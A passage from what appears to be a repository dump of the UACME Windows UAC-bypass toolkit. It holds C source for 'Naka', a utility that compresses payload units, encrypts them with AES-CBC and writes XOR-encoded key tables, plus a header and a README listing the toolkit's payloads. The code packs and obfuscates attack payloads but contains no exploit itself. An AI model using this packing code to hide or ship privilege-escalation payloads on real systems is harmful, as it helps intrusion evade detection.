&hAlgSha256,\n BCRYPT_SHA256_ALGORITHM,\n NULL, 0)))\n {\n break;\n }\n\n //\n // CNG object allocation.\n //\n\n if (!NT_SUCCESS(BCryptGetProperty(\n hAlgSha256,\n BCRYPT_OBJECT_LENGTH,\n (PUCHAR)&cbKeyObject,\n sizeof(DWORD),\n &cbResult,\n 0)))\n {\n break;\n }\n\n pbKeyObject = (PBYTE)HeapAlloc(\n hHeap,\n HEAP_ZERO_MEMORY,\n cbKeyObject);\n\n if (pbKeyObject == NULL)\n break;\n\n //\n // Hash buffer allocation.\n //\n\n cbResult = 0;\n if (!NT_SUCCESS(BCryptGetProperty(\n hAlgSha256,\n BCRYPT_HASH_LENGTH,\n (PUCHAR)&_cbHash,\n sizeof(DWORD),\n &cbResult, 0)))\n {\n break;\n }\n\n _pbHash = (PBYTE)HeapAlloc(\n hHeap,\n HEAP_ZERO_MEMORY,\n _cbHash);\n\n if (_pbHash == NULL)\n break;\n\n //\n // Create hash from buffer.\n //\n\n if (!NT_SUCCESS(BCryptCreateHash(\n hAlgSha256,\n &hHashSha256,\n pbKeyObject,\n cbKeyObject,\n NULL,\n 0,\n 0)))\n {\n break;\n }\n\n if (!NT_SUCCESS(BCryptHashData(\n hHashSha256,\n (PUCHAR)pbBuffer,\n (ULONG)cbBuffer,\n 0)))\n {\n break;\n }\n\n if (!NT_SUCCESS(BCryptFinishHash(\n hHashSha256,\n _pbHash,\n _cbHash,\n 0)))\n {\n break;\n }\n\n BCryptDestroyHash(hHashSha256);\n hHashSha256 = NULL;\n\n BCryptCloseAlgorithmProvider(hAlgSha256, 0);\n hAlgSha256 = NULL;\n\n HeapFree(hHeap, 0, pbKeyObject);\n pbKeyObject = NULL;\n\n *pbHash = _pbHash;\n *pcbHash = _cbHash;\n\n bResult = TRUE;\n\n } while (FALSE);\n\n if (hHashSha256) BCryptDestroyHash(hHashSha256);\n if (hAlgSha256) BCryptCloseAlgorithmProvider(hAlgSha256, 0);\n\n if (pbKeyObject) HeapFree(hHeap, 0, pbKeyObject);\n\n if (bResult == FALSE) {\n\n *pbHash = NULL;\n *pcbHash = 0;\n\n if (_pbHash) HeapFree(hHeap, 0, _pbHash);\n }\n\n return bResult;\n}\n\n/*\n* GenerateIV\n*\n* Purpose:\n*\n* Crypto-random generated initialization vector for AES encryption.\n*\n*/\nBOOL GenerateIV(\n _In_ PBYTE pbIV,\n _In_ DWORD cbIV\n)\n{\n BOOL bResult = FALSE;\n BCRYPT_ALG_HANDLE hAlgRng = NULL;\n\n do {\n\n if (!NT_SUCCESS(BCryptOpenAlgorithmProvider(\n &hAlgRng,\n BCRYPT_RNG_ALGORITHM,\n NULL,\n 0)))\n {\n break;\n }\n\n bResult = (NT_SUCCESS(BCryptGenRandom(\n hAlgRng,\n pbIV,\n cbIV,\n 0)));\n\n } while (FALSE);\n\n if (hAlgRng)\n BCryptCloseAlgorithmProvider(hAlgRng, 0);\n\n return bResult;\n}\n\n/*\n* DecryptBuffer\n*\n* Purpose:\n*\n* Decrypt AES encrypted buffer.\n*\n*/\nBOOL DecryptBuffer(\n _In_ PBYTE pbBuffer,\n _In_ DWORD cbBuffer,\n _In_ PBYTE pbIV,\n _In_ PBYTE pbSecret,\n _In_ DWORD cbSecret,\n _Out_ PBYTE *pbDecryptedBuffer,\n _Out_ PDWORD pcbDecryptedBuffer\n)\n{\n BOOL bResult = FALSE;\n BCRYPT_ALG_HANDLE hAlgAes = NULL;\n BCRYPT_KEY_HANDLE hKey = NULL;\n HANDLE heapCNG = NULL;\n DWORD cbCipherData, cbKeyObject, cbResult, cbBlockLen;\n PBYTE pbKeyObject = NULL, pbCipherData = NULL;\n\n do {\n\n heapCNG = HeapCreate(0, 0, 0);\n if (heapCNG == NULL)\n break;\n\n if (!NT_SUCCESS(BCryptOpenAlgorithmProvider(\n &hAlgAes,\n BCRYPT_AES_ALGORITHM,\n NULL,\n 0)))\n {\n break;\n }\n\n cbKeyObject = 0;\n cbResult = 0;\n\n if (!NT_SUCCESS(BCryptGetProperty(\n hAlgAes,\n BCRYPT_OBJECT_LENGTH,\n (PUCHAR)&cbKeyObject,\n sizeof(DWORD),\n &cbResult,\n 0)))\n {\n break;\n }\n\n pbKeyObject = (PBYTE)HeapAlloc(heapCNG, HEAP_ZERO_MEMORY, cbKeyObject);\n if (pbKeyObject == NULL)\n break;\n\n cbBlockLen = 0;\n\n if (!NT_SUCCESS(BCryptGetProperty(hAlgAes,\n BCRYPT_BLOCK_LENGTH,\n (PUCHAR)&cbBlockLen,\n sizeof(DWORD),\n &cbResult,\n 0)))\n {\n break;\n }\n\n if (cbBlockLen > DCU_IV_MAX_BLOCK_LENGTH)\n break;\n\n if (!NT_SUCCESS(BCryptGenerateSymmetricKey(\n hAlgAes,\n &hKey,\n pbKeyObject,\n cbKeyObject,\n pbSecret,\n cbSecret,\n 0)))\n {\n break;\n }\n\n cbCipherData = 0;\n if (!NT_SUCCESS(BCryptDecrypt(\n hKey,\n pbBuffer,\n cbBuffer,\n NULL,\n pbIV,\n cbBlockLen,\n NULL,\n 0,\n &cbCipherData,\n BCRYPT_BLOCK_PADDING)))\n {\n break;\n }\n\n pbCipherData = (PBYTE)HeapAlloc(\n GetProcessHeap(),\n HEAP_ZERO_MEMORY,\n cbCipherData);\n\n if (pbCipherData == NULL) {\n break;\n }\n\n cbResult = 0;\n if (!NT_SUCCESS(BCryptDecrypt(\n hKey,\n pbBuffer,\n cbBuffer,\n NULL,\n pbIV,\n cbBlockLen,\n pbCipherData,\n cbCipherData,\n &cbResult,\n BCRYPT_BLOCK_PADDING)))\n {\n break;\n }\n\n BCryptDestroyKey(hKey);\n hKey = NULL;\n\n *pbDecryptedBuffer = pbCipherData;\n *pcbDecryptedBuffer = cbCipherData;\n\n bResult = TRUE;\n\n } while (FALSE);\n\n if (hKey != NULL)\n BCryptDestroyKey(hKey);\n\n if (hAlgAes != NULL)\n BCryptCloseAlgorithmProvider(hAlgAes, 0);\n\n if (heapCNG) HeapDestroy(heapCNG);\n\n if (bResult == FALSE) {\n if (pbCipherData) {\n HeapFree(GetProcessHeap(), HEAP_ZERO_MEMORY, pbCipherData);\n }\n *pbDecryptedBuffer = NULL;\n *pcbDecryptedBuffer = 0;\n }\n\n return bResult;\n}\n\n/*\n* EncryptBuffer\n*\n* Purpose:\n*\n* Encrypt given buffer with AES-CBC.\n*\n*/\nBOOL EncryptBuffer(\n _In_ PBYTE pbBuffer,\n _In_ DWORD cbBuffer,\n _Inout_ PBYTE pbIV,\n _In_ PBYTE pbSecret,\n _In_ DWORD cbSecret,\n _Out_ PBYTE *pbEncryptedBuffer,\n _Out_ PDWORD pcbEncryptedBuffer\n)\n{\n BOOL bResult = FALSE;\n BCRYPT_ALG_HANDLE hAlgAes = NULL;\n BCRYPT_KEY_HANDLE hKey = NULL;\n HANDLE heapCNG = NULL;\n DWORD cbCipherData, cbObject, cbResult, cbBlockLen;\n PBYTE pbObject, pbCipherData = NULL, _pbIV;\n\n do {\n\n heapCNG = HeapCreate(0, 0, 0);\n if (heapCNG == NULL)\n break;\n\n if (!NT_SUCCESS(BCryptOpenAlgorithmProvider(\n &hAlgAes,\n BCRYPT_AES_ALGORITHM,\n NULL,\n 0)))\n {\n break;\n }\n\n cbObject = 0;\n cbResult = 0;\n\n if (!NT_SUCCESS(BCryptGetProperty(\n hAlgAes,\n BCRYPT_OBJECT_LENGTH,\n (PUCHAR)&cbObject,\n sizeof(DWORD),\n &cbResult,\n 0)))\n {\n break;\n }\n\n pbObject = (PBYTE)HeapAlloc(heapCNG, HEAP_ZERO_MEMORY, cbObject);\n if (pbObject == NULL)\n break;\n\n cbBlockLen = 0;\n\n if (!NT_SUCCESS(BCryptGetProperty(hAlgAes,\n BCRYPT_BLOCK_LENGTH,\n (PUCHAR)&cbBlockLen,\n sizeof(DWORD),\n &cbResult,\n 0)))\n {\n break;\n }\n\n if (cbBlockLen > DCU_IV_MAX_BLOCK_LENGTH)\n break;\n\n if (!GenerateIV(pbIV, cbBlockLen))\n break;\n\n _pbIV = (PBYTE)HeapAlloc(heapCNG, HEAP_ZERO_MEMORY, cbBlockLen);\n if (_pbIV == NULL)\n break;\n\n RtlCopyMemory(_pbIV, pbIV, cbBlockLen);\n\n if (!NT_SUCCESS(BCryptSetProperty( //-V542\n hAlgAes,\n BCRYPT_CHAINING_MODE,\n (PUCHAR)BCRYPT_CHAIN_MODE_CBC,\n sizeof(BCRYPT_CHAIN_MODE_CBC),\n 0)))\n {\n break;\n }\n\n if (!NT_SUCCESS(BCryptGenerateSymmetricKey(\n hAlgAes,\n &hKey,\n pbObject,\n cbObject,\n pbSecret,\n cbSecret,\n 0)))\n {\n break;\n }\n\n cbCipherData = 0;\n if (!NT_SUCCESS(BCryptEncrypt(\n hKey,\n pbBuffer,\n cbBuffer,\n NULL,\n _pbIV,\n cbBlockLen,\n NULL,\n 0,\n &cbCipherData,\n BCRYPT_BLOCK_PADDING)))\n {\n break;\n }\n\n pbCipherData = (PBYTE)HeapAlloc(\n GetProcessHeap(),\n HEAP_ZERO_MEMORY,\n cbCipherData);\n\n if (pbCipherData == NULL) {\n break;\n }\n\n cbResult = 0;\n if (!NT_SUCCESS(BCryptEncrypt(\n hKey,\n pbBuffer,\n cbBuffer,\n NULL,\n _pbIV,\n cbBlockLen,\n pbCipherData,\n cbCipherData,\n &cbResult,\n BCRYPT_BLOCK_PADDING)))\n {\n break;\n }\n\n BCryptDestroyKey(hKey);\n hKey = NULL;\n\n *pbEncryptedBuffer = pbCipherData;\n *pcbEncryptedBuffer = cbCipherData;\n bResult = TRUE;\n\n } while (FALSE);\n\n if (hKey != NULL)\n BCryptDestroyKey(hKey);\n\n if (hAlgAes != NULL)\n BCryptCloseAlgorithmProvider(hAlgAes, 0);\n\n if (heapCNG) {\n HeapDestroy(heapCNG);\n }\n\n if (bResult == FALSE) {\n if (pbCipherData) HeapFree(GetProcessHeap(), HEAP_ZERO_MEMORY, pbCipherData);\n *pbEncryptedBuffer = NULL;\n *pcbEncryptedBuffer = 0;\n }\n\n return bResult;\n}\n\n/*\n* supWriteBufferToFile\n*\n* Purpose:\n*\n* Create new file and write buffer to it.\n*\n*/\nBOOL supWriteBufferToFile(\n _In_ LPWSTR lpFileName,\n _In_ PVOID Buffer,\n _In_ DWORD BufferSize\n)\n{\n HANDLE hFile;\n DWORD bytesIO;\n\n if (Buffer == NULL || BufferSize == 0)\n return FALSE;\n\n hFile = CreateFileW(lpFileName,\n GENERIC_WRITE, 0, NULL, CREATE_ALWAYS, 0, NULL);\n\n if (hFile == INVALID_HANDLE_VALUE) {\n return FALSE;\n }\n\n WriteFile(hFile, Buffer, BufferSize, &bytesIO, NULL);\n CloseHandle(hFile);\n\n return (bytesIO == BufferSize);\n}\n\n/*\n* supReadBufferFromFile\n*\n* Purpose:\n*\n* Open existing file and read from it to buffer.\n*\n*/\nPVOID supReadBufferFromFile(\n _In_ LPWSTR lpFileName,\n _Out_ PLARGE_INTEGER FileSize\n)\n{\n BOOL bSuccess = FALSE;\n DWORD r;\n PVOID FileData = NULL;\n HANDLE hFile = INVALID_HANDLE_VALUE;\n LARGE_INTEGER fileSize;\n\n do {\n\n hFile = CreateFile(\n lpFileName,\n GENERIC_READ,\n FILE_SHARE_READ,\n NULL,\n OPEN_EXISTING,\n 0,\n NULL);\n\n if (hFile != INVALID_HANDLE_VALUE) {\n\n fileSize.QuadPart = 0;\n if (!GetFileSizeEx(hFile, &fileSize))\n break;\n\n if (fileSize.QuadPart == 0)\n break;\n\n FileData = HeapAlloc(\n GetProcessHeap(),\n HEAP_ZERO_MEMORY,\n (SIZE_T)fileSize.LowPart);\n\n if (FileData == NULL)\n break;\n\n if (!ReadFile(\n hFile,\n FileData,\n fileSize.LowPart,\n (LPDWORD)&r, NULL))\n {\n HeapFree(GetProcessHeap(), 0, FileData);\n FileData = NULL;\n break;\n }\n\n if (FileSize)\n *FileSize = fileSize;\n\n bSuccess = TRUE;\n }\n\n } while (FALSE);\n\n if (!bSuccess) {\n if (FileSize) {\n fileSize.QuadPart = 0;\n *FileSize = fileSize;\n }\n }\n\n if (hFile != INVALID_HANDLE_VALUE)\n CloseHandle(hFile);\n\n return FileData;\n}\n\n/*\n* IsValidContainerHeader\n*\n* Purpose:\n*\n* Basic santity checks over container header.\n*\n*/\nBOOL IsValidContainerHeader(\n _In_ PDCU_HEADER UnitHeader,\n _In_ DWORD FileSize\n)\n{\n DWORD HeaderCrc;\n\n __try {\n if ((UnitHeader->Magic != UACME_CONTAINER_PACKED_DATA) && //Naka\n (UnitHeader->Magic != UACME_CONTAINER_PACKED_UNIT) && //Naka\n (UnitHeader->Magic != UACME_CONTAINER_PACKED_CODE) && //Kuma\n (UnitHeader->Magic != UACME_CONTAINER_PACKED_KEYS)) //Kuma\n {\n return FALSE;\n }\n\n //\n // Note that IV has different meaning in Kuma containers.\n //\n\n HeaderCrc = UnitHeader->HeaderCrc;\n UnitHeader->HeaderCrc = 0;\n if (RtlComputeCrc32(0, UnitHeader, sizeof(DCU_HEADER)) != HeaderCrc)\n return FALSE;\n\n if ((UnitHeader->cbData == 0) ||\n (UnitHeader->cbDeltaSize == 0))\n return FALSE;\n if (UnitHeader->cbData > FileSize)\n return FALSE;\n if (UnitHeader->cbDeltaSize > FileSize)\n return FALSE;\n if (UnitHeader->cbDeltaSize > UnitHeader->cbData)\n return FALSE;\n }\n __except (EXCEPTION_EXECUTE_HANDLER) {\n return FALSE;\n }\n\n return TRUE;\n}\n\n/*\n* DecompressContainerUnit\n*\n* Purpose:\n*\n* Decompress given container file.\n*\n*/\nvoid DecompressContainerUnit(\n _In_ LPWSTR lpInputFile,\n _In_ LPWSTR lpKeyFile\n)\n{\n PUCHAR FileData = NULL;\n LPWSTR NewName = NULL;\n SIZE_T sz = 0;\n LARGE_INTEGER FileSize, KeyFileSize;\n\n PDCU_HEADER UnitHeader;\n\n PBYTE pbDecryptedBuffer = NULL;\n DWORD cbDecryptedBuffer = 0;\n\n DELTA_INPUT diDelta, diSource;\n DELTA_OUTPUT doOutput;\n\n HANDLE hHeap = GetProcessHeap();\n\n PBYTE pbKeyBlob = NULL;\n\n PBYTE DataPtr;\n\n do {\n sz = (1 + _strlen(lpInputFile)) * sizeof(WCHAR);\n NewName = (LPWSTR)HeapAlloc(hHeap, HEAP_ZERO_MEMORY, sz);\n if (NewName == NULL)\n break;\n\n FileSize.QuadPart = 0;\n FileData = (PUCHAR)supReadBufferFromFile(lpInputFile, &FileSize);\n if ((FileData == NULL) || (FileSize.QuadPart == 0))\n break;\n\n KeyFileSize.QuadPart = 0;\n pbKeyBlob = (PBYTE)supReadBufferFromFile(lpKeyFile, &KeyFileSize);\n if ((pbKeyBlob == NULL) || (KeyFileSize.QuadPart == 0))\n break;\n\n UnitHeader = (PDCU_HEADER)FileData;\n\n if (!IsValidContainerHeader(UnitHeader, FileSize.LowPart))\n break;\n\n DataPtr = (PBYTE)UnitHeader + sizeof(DCU_HEADER);\n\n if (!DecryptBuffer(\n (PBYTE)DataPtr,\n UnitHeader->cbData,\n UnitHeader->bIV,\n (PBYTE)pbKeyBlob,\n KeyFileSize.LowPart,\n &pbDecryptedBuffer,\n &cbDecryptedBuffer))\n {\n break;\n }\n\n if (cbDecryptedBuffer > FileSize.LowPart)\n break;\n\n RtlSecureZeroMemory(&diSource, sizeof(DELTA_INPUT));\n RtlSecureZeroMemory(&diDelta, sizeof(DELTA_INPUT));\n RtlSecureZeroMemory(&doOutput, sizeof(DELTA_OUTPUT));\n\n diDelta.Editable = FALSE;\n diDelta.lpcStart = pbDecryptedBuffer;\n diDelta.uSize = UnitHeader->cbDeltaSize;\n\n if (ApplyDeltaB(DELTA_FILE_TYPE_RAW, diSource, diDelta, &doOutput)) {\n\n if (_filename_noext(NewName, lpInputFile)) {\n _strcat(NewName, TEXT(\".out\"));\n supWriteBufferToFile(NewName, doOutput.lpStart, (DWORD)doOutput.uSize);\n }\n\n DeltaFree(doOutput.lpStart);\n }\n\n } while (FALSE);\n\n if (pbDecryptedBuffer != NULL)\n HeapFree(hHeap, 0, pbDecryptedBuffer);\n if (NewName != NULL)\n HeapFree(hHeap, 0, NewName);\n if (FileData != NULL)\n HeapFree(hHeap, 0, FileData);\n if (pbKeyBlob != NULL)\n HeapFree(hHeap, 0, pbKeyBlob);\n\n}\n\n/*\n* CreateContainerPackedUnit\n*\n* Purpose:\n*\n* Create container with compressed file inside.\n*\n*/\nvoid CreateContainerPackedUnit(\n _In_ LPWSTR lpInputFile\n)\n{\n PUCHAR FileData = NULL;\n HANDLE hHeap = GetProcessHeap();\n LPWSTR NewName = NULL;\n SIZE_T sz = 0;\n LARGE_INTEGER FileSize;\n\n DELTA_INPUT d_in, d_target, s_op, t_op, g_op;\n DELTA_OUTPUT d_out;\n\n PBYTE pbHash = NULL, pbEncryptedBuffer = NULL;\n DWORD cbHash = 0, cbEncryptedBuffer = 0;\n\n PDCU_HEADER UnitHeader;\n PIMAGE_NT_HEADERS NtHeaders;\n PIMAGE_FILE_HEADER fheader;\n\n PVOID hashSource;\n DWORD hashSize, Magic;\n\n PBYTE DataPtr;\n\n#ifdef _DEBUG\n LPWSTR KeyName = NULL;\n#endif\n\n BYTE bIV[DCU_IV_MAX_BLOCK_LENGTH];\n\n do {\n RtlSecureZeroMemory(&d_out, sizeof(DELTA_OUTPUT));\n\n sz = (1 + _strlen(lpInputFile)) * sizeof(WCHAR);\n NewName = (LPWSTR)HeapAlloc(hHeap, HEAP_ZERO_MEMORY, sz);\n if (NewName == NULL)\n break;\n\n#ifdef _DEBUG\n KeyName = (LPWSTR)HeapAlloc(hHeap, HEAP_ZERO_MEMORY, sz);\n if (KeyName == NULL)\n break;\n#endif\n\n FileSize.QuadPart = 0;\n FileData = (PUCHAR)supReadBufferFromFile(lpInputFile, &FileSize);\n if ((FileData == NULL) || (FileSize.QuadPart == 0))\n break;\n\n NtHeaders = RtlImageNtHeader(FileData);\n if (NtHeaders == NULL) {\n //\n // Not an image file, use whole file SHA256 hash as key.\n //\n hashSource = FileData;\n hashSize = FileSize.LowPart;\n\n Magic = UACME_CONTAINER_PACKED_DATA;\n }\n else {\n\n //\n // Image file, create SHA256 hash from IMAGE_FILE_HEADER.\n //\n fheader = &NtHeaders->FileHeader;\n hashSource = fheader;\n hashSize = sizeof(IMAGE_FILE_HEADER);\n\n Magic = UACME_CONTAINER_PACKED_UNIT;\n }\n\n if (!CreateSha256HashForBuffer((PBYTE)hashSource, hashSize, &pbHash, &cbHash))\n break;\n\n if (cbHash > 32)\n break;\n\n if (_filename_noext(NewName, lpInputFile)) {\n _strcat(NewName, TEXT(\".key\"));\n supWriteBufferToFile(NewName, pbHash, (DWORD)cbHash);\n }\n\n //\n // Pack file to buffer.\n //\n\n RtlSecureZeroMemory(&d_in, sizeof(DELTA_INPUT));\n d_target.lpcStart = FileData;\n d_target.uSize = FileSize.LowPart;\n d_target.Editable = FALSE;\n\n RtlSecureZeroMemory(&s_op, sizeof(DELTA_INPUT));\n RtlSecureZeroMemory(&t_op, sizeof(DELTA_INPUT));\n RtlSecureZeroMemory(&g_op, sizeof(DELTA_INPUT));\n\n if (!CreateDeltaB(DELTA_FILE_TYPE_RAW,\n DELTA_FLAG_NONE,\n DELTA_FLAG_NONE,\n d_in,\n d_target,\n s_op,\n t_op,\n g_op,\n NULL,\n 0,\n &d_out))\n {\n break;\n }\n\n //\n // Encrypt buffer with AES-CBC using SHA256 hash as key.\n // \n\n RtlSecureZeroMemory(&bIV, sizeof(bIV));\n\n if (!EncryptBuffer(\n (PBYTE)d_out.lpStart,\n (DWORD)d_out.uSize,\n (PBYTE)&bIV,\n pbHash,\n cbHash,\n &pbEncryptedBuffer,\n &cbEncryptedBuffer))\n {\n break;\n }\n\n DeltaFree(d_out.lpStart);\n d_out.lpStart = NULL;\n\n //\n // Build final package and save it to disk.\n //\n\n sz = sizeof(DCU_HEADER) + cbEncryptedBuffer;\n UnitHeader = (PDCU_HEADER)HeapAlloc(\n hHeap,\n HEAP_ZERO_MEMORY,\n sz);\n\n if (UnitHeader) {\n\n UnitHeader->Magic = Magic;\n UnitHeader->cbData = cbEncryptedBuffer;\n UnitHeader->cbDeltaSize = (DWORD)d_out.uSize; //original compressed delta size\n\n RtlCopyMemory(UnitHeader->bIV, bIV, DCU_IV_MAX_BLOCK_LENGTH);\n\n UnitHeader->HeaderCrc = RtlComputeCrc32(0, UnitHeader, sizeof(DCU_HEADER));\n\n DataPtr = (PBYTE)UnitHeader + sizeof(DCU_HEADER);\n RtlCopyMemory(DataPtr, pbEncryptedBuffer, cbEncryptedBuffer);\n\n if (_filename_noext(NewName, lpInputFile)) {\n _strcat(NewName, TEXT(\".cd\"));\n supWriteBufferToFile(NewName, UnitHeader, (DWORD)sz);\n }\n HeapFree(GetProcessHeap(), 0, UnitHeader);\n }\n\n } while (FALSE);\n\n if (d_out.lpStart)\n DeltaFree(d_out.lpStart);\n\n if (pbHash)\n HeapFree(hHeap, 0, pbHash);\n\n if (pbEncryptedBuffer)\n HeapFree(hHeap, 0, pbEncryptedBuffer);\n\n#ifdef _DEBUG\n if (_filename_noext(NewName, lpInputFile)) {\n _strcat(NewName, TEXT(\".cd\"));\n if (_filename_noext(KeyName, lpInputFile)) {\n _strcat(KeyName, TEXT(\".key\"));\n DecompressContainerUnit(NewName, KeyName);\n }\n }\n\n if (KeyName != NULL)\n HeapFree(hHeap, 0, KeyName);\n#endif\n if (NewName != NULL)\n HeapFree(hHeap, 0, NewName);\n\n if (FileData != NULL)\n HeapFree(hHeap, 0, FileData);\n}\n\n#define UACME_KEY_SIZE 32\n#define UACME_MAX_UNITS 12 //set actual number from github version\n#define AKAGI_XOR_KEY 'naka'\n\ntypedef struct _DCK_HEADER {\n DWORD Id;\n BYTE Data[UACME_KEY_SIZE];\n} DCK_HEADER, *PDCK_HEADER;\n\n/*\n* EncodeBuffer\n*\n* Purpose:\n*\n* Decrypt/Encrypt given buffer.\n*\n*/\nVOID EncodeBuffer(\n PVOID Buffer,\n ULONG BufferSize\n)\n{\n ULONG k, c;\n PUCHAR ptr;\n\n if ((Buffer == NULL) || (BufferSize == 0))\n return;\n\n k = AKAGI_XOR_KEY;\n c = BufferSize;\n ptr = (PUCHAR)Buffer;\n\n do {\n *ptr ^= k;\n k = _rotl(k, 1);\n ptr++;\n --c;\n } while (c != 0);\n}\n\n//\n// Keep in sync with Akagi\n//\n#define IDR_FUBUKI64 100\n#define IDR_IKAZUCHI64 102\n#define IDR_AKATSUKI64 103\n#define IDR_KAMIKAZE64 104\n\n#define IDR_FUBUKI32 200\n#define IDR_IKAZUCHI32 202\n#define IDR_KAMIKAZE 203\n\nBOOL ProcessUnit(\n _In_ PWSTR UnitKeyName,\n _In_ ULONG UnitID,\n _In_ PDCK_HEADER UnitHeader)\n{\n PWCHAR pBuffer;\n LARGE_INTEGER fs;\n\n pBuffer = (PWCHAR)supReadBufferFromFile(UnitKeyName, &fs);\n if (pBuffer) {\n if (fs.LowPart != UACME_KEY_SIZE) {\n\n MessageBox(\n GetDesktopWindow(),\n L\"Unexpected key size.\",\n NULL,\n MB_ICONERROR);\n\n return FALSE;\n }\n\n UnitHeader->Id = UnitID;\n RtlCopyMemory(UnitHeader->Data, pBuffer, fs.LowPart);\n HeapFree(GetProcessHeap(), 0, pBuffer);\n }\n else {\n\n MessageBox(\n GetDesktopWindow(),\n L\"File read error, memory not allocated.\",\n NULL,\n MB_ICONERROR);\n\n return FALSE;\n }\n return TRUE;\n}\n\nVOID CreateSecretTables(VOID)\n{\n INT c = 0;\n SIZE_T l = 0;\n DCK_HEADER S[UACME_MAX_UNITS];\n\n WCHAR szFileName[MAX_PATH * 2];\n\n RtlSecureZeroMemory(szFileName, sizeof(szFileName));\n\n#ifdef _DEBUG\n _strcpy(szFileName, L\"Z:\\\\HE\\\\UACME\\\\Compress\");\n#else\n GetCurrentDirectory(MAX_PATH, szFileName);\n#endif\n\n _strcat(szFileName, L\"\\\\\");\n\n l = _strlen(szFileName);\n szFileName[l] = 0;\n\n //\n // Build secrets64\n //\n c = 0;\n RtlSecureZeroMemory(S, sizeof(S));\n\n _strcat(&szFileName[l], L\"Akatsuki64.key\");\n if (ProcessUnit(szFileName, IDR_AKATSUKI64, &S[c]))\n c++;\n\n szFileName[l] = 0;\n _strcat(&szFileName[l], L\"Fubuki64.key\");\n if (ProcessUnit(szFileName, IDR_FUBUKI64, &S[c]))\n c++;\n\n szFileName[l] = 0;\n _strcat(&szFileName[l], L\"Fubuki32.key\");\n if (ProcessUnit(szFileName, IDR_FUBUKI32, &S[c]))\n c++;\n\n szFileName[l] = 0;\n _strcat(&szFileName[l], L\"Kamikaze.key\");\n if (ProcessUnit(szFileName, IDR_KAMIKAZE64, &S[c]))\n c++;\n\n EncodeBuffer(S, c * sizeof(DCK_HEADER));\n szFileName[l] = 0;\n _strcat(&szFileName[l], L\"secrets64.bin\");\n supWriteBufferToFile(szFileName, S, c * sizeof(DCK_HEADER));\n\n //\n // Build secrets32\n //\n c = 0;\n RtlSecureZeroMemory(S, sizeof(S));\n szFileName[l] = 0;\n _strcat(&szFileName[l], L\"Fubuki32.key\");\n if (ProcessUnit(szFileName, IDR_FUBUKI32, &S[c]))\n c++;\n\n szFileName[l] = 0;\n _strcat(&szFileName[l], L\"Kamikaze.key\");\n if (ProcessUnit(szFileName, IDR_KAMIKAZE, &S[c]))\n c++;\n\n EncodeBuffer(S, c * sizeof(DCK_HEADER));\n szFileName[l] = 0;\n _strcat(&szFileName[l], L\"secrets32.bin\");\n supWriteBufferToFile(szFileName, S, c * sizeof(DCK_HEADER));\n}\n\n/*\n* main\n*\n* Purpose:\n*\n* Program entry point.\n*\n*/\nvoid main()\n{\n LPWSTR FirstParam = NULL;\n LPWSTR *szArglist;\n INT nArgs = 0;\n\n szArglist = CommandLineToArgvW(GetCommandLineW(), &nArgs);\n if (szArglist) {\n\n if (nArgs > 1) {\n FirstParam = szArglist[1];\n if (FirstParam) {\n if (_strcmpi(FirstParam, L\"--stable\") == 0) {\n CreateSecretTables();\n }\n else {\n CreateContainerPackedUnit(FirstParam);\n }\n }\n }\n else {\n MessageBox(\n GetDesktopWindow(), \n TEXT(\"Input file not specified\"), \n TEXT(\"Naka\"), \n MB_ICONINFORMATION);\n }\n\n LocalFree(szArglist);\n }\n\n ExitProcess(0);\n}\n"
},
{
"path": "Source/Naka/naka.h",
"content": "/*******************************************************************************\n*\n* (C) COPYRIGHT AUTHORS, 2018 - 2021\n*\n* TITLE: NAKA.H\n*\n* VERSION: 3.03\n*\n* DATE: 15 July 2021\n*\n* Common header file for Naka.\n*\n* THIS CODE AND INFORMATION IS PROVIDED \"AS IS\" WITHOUT WARRANTY OF\n* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED\n* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A\n* PARTICULAR PURPOSE.\n*\n*******************************************************************************/\n\n#pragma once\n\n\n#if !defined UNICODE\n#error ANSI build is not supported\n#endif\n\n#include \"shared\\libinc.h\"\n\n#pragma comment(lib, \"msdelta.lib\")\n#pragma comment(lib, \"Bcrypt.lib\")\n\n//disable nonmeaningful warnings.\n#pragma warning(disable: 4005) // macro redefinition\n#pragma warning(disable: 4055) // %s : from data pointer %s to function pointer %s\n#pragma warning(disable: 4152) // nonstandard extension, function/data pointer conversion in expression\n#pragma warning(disable: 4201) // nonstandard extension used : nameless struct/union\n#pragma warning(disable: 6102) // Using %s from failed function call at line %u\n#pragma warning(disable: 6320) // exception-filter expression is the constant EXCEPTION_EXECUTE_HANDLER\n\n#include \n#include \n#include \n#include \n#include \"shared\\ntos\\ntos.h\"\n#include \"shared\\minirtl.h\"\n#include \"shared\\cmdline.h\"\n#include \"shared\\_filename.h\"\n\n#define UACME_CONTAINER_PACKED_UNIT 'UPCU' //Naka handling\n#define UACME_CONTAINER_PACKED_DATA 'DPCU' //Naka handling\n#define UACME_CONTAINER_PACKED_CODE 'CPCU' //Kuma handling\n#define UACME_CONTAINER_PACKED_KEYS 'KPCU' //Kuma handling\n\n//Initialization vector max bytes\n#define DCU_IV_MAX_BLOCK_LENGTH 16\n\ntypedef struct _DCU_HEADER {\n DWORD Magic;\n DWORD cbData;\n DWORD cbDeltaSize;\n DWORD HeaderCrc;\n BYTE bIV[DCU_IV_MAX_BLOCK_LENGTH];\n //PBYTE pbData[1]; /* not a member of the structure */\n} DCU_HEADER, *PDCU_HEADER;\n"
},
{
"path": "Source/README.md",
"content": "## Units\n\n- Akagi, x64/x86-32 main executable file, contain payload/data units.\n- Akatsuki, x64 payload, WOW64 logger.\n- Fubuki, x64/x86-32 payload, general purpose.\n- Kamikaze, data, MMC snap-in.\n- Naka, x64/x86-32 compressor for other payload/data units.\n- Yuubari, x64 UAC info data dumper.\n\n## Other\n\n- Shared, contain headers and source code shared between several projects.\n"
},
{
"path": "Source/Shared/_filename.c",
